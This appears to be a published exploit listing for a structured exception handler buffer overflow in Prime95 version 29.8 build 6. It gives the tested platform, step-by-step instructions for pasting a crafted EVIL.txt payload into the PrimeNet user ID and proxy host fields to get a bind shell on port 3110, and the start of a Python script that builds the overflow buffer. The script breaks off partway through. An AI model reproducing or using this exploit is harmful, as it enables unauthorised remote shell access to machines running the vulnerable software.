# Exploit Title: Prime95 Version 29.8 build 6 - Buffer Overflow (SEH) # Date: 2019-12-22 # Vendor Homepage: https://www.mersenne.org # Software Link: http://www.mersenne.org/ftp_root/gimps/p95v298b6.win32.zip # Exploit Author: Achilles # Tested Version: 29.8 build 6 # Tested on: Windows 7 x64 # 1.- Run python code:Prime95.py # 2.- Open EVIL.txt and copy content to Clipboard # 3.- Open Prime95.exe go to PrimeNet # 4.- Paste the Content of EVIL.txt into the field "Optional User ID and Optional Computer Name" # 5.- Click Connection Paste the Content of EVIL.txt into the field "Option al proxy Host" # 6.- Press ok Twice and you will have a bind shell port 3110 # 7.- Greetings go:XiDreamzzXi,Metatron #!/usr/bin/env python import struct buffer =3D "\x41" * 660 nseh =3D "\xeb\x06\x90\x90" #jmp short 6 seh =3D struct.pack('